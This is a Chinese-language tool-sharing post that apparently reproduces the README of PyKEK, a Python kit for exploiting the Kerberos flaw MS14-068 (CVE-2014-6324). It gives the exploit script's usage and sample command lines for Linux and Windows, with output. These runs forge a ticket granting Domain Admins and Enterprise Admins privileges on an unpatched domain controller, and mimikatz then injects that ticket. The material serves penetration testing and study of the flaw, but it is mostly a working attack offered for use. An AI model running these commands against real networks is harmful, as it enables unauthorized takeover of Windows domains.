Kerberos漏洞利用工具包

作者:Sec-Labs | 发布时间:

项目地址

https://github.com/mubix/pykek

小编推荐

PyKEK是一个用于操纵KRB5相关数据的Python库,可用于利用MS14-068(CVE-2014-6324)漏洞。该库包含以下内容:

相关技术点

  • kek.krb5: Kerberos V5 ASN.1结构和基本协议函数
  • kek.ccache: 凭证缓存二进制格式
  • kek.pac: Microsoft特权属性证书数据结构
  • kek.crypto: Kerberos和MS特定的加密函数

项目用途

该项目旨在演示如何利用Kerberos漏洞。 ms14-068.py脚本可以利用MS14-068漏洞在未打补丁的域控制器上,获取现有域用户帐户的Kerberos票据,具备以下域组的特权:

  • Domain Users (513)
  • Domain Admins (512)
  • Schema Admins (518)
  • Enterprise Admins (519)
  • Group Policy Creator Owners (520)

用户可以使用该项目了解漏洞利用的原理和方法,以及如何保护系统。

Python Kerberos Exploitation Kit

PyKEK(Python Kerberos Exploitation Kit)是一个用于操作KRB5相关数据的Python库。(目前还在开发中)

目前,只有一些功能已经以相当粗糙的方式实现(用于利用MS14-068(CVE-2014-6324))。

更多功能即将推出...

作者

Sylvain Monné

联系方式:sylvain dot monne at solucom dot fr

http://twitter.com/bidord

库内容

  • kek.krb5:Kerberos V5(RFC 4120)ASN.1结构和基本协议函数
  • kek.ccache:凭据缓存二进制格式(cchache
  • kek.pac:Microsoft特权属性证书数据结构(MS-PAC
  • kek.crypto:Kerberos和MS特定的加密函数

漏洞利用

ms14-068.py

利用MS14-680漏洞,获取具有以下域组权限的现有域用户帐户的Kerberos票据,用于未打补丁的Active Directory域中的域控制器:

  • 域用户(513)
  • 域管理员(512)
  • 架构管理员(518)
  • 企业管理员(519)
  • 组策略创建者所有者(520)

用法:

USAGE:
ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>

OPTIONS:
    -p <clearPassword>
 --rc4 <ntlmHash>

示例用法:

Linux(使用samba和MIT Kerberos进行测试)

root@kali:~/sploit/pykek# python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
Password: 
  [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!
  [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!
  [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!
  [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!
  [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!
  [+] Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'... Done!
root@kali:~/sploit/pykek# mv TGT_user-a-1@dom-a.loc.ccache /tmp/krb5cc_0 

在Windows上

python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc
mimikatz.exe "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit`

 

标签:工具分享, 云安全, Kerberos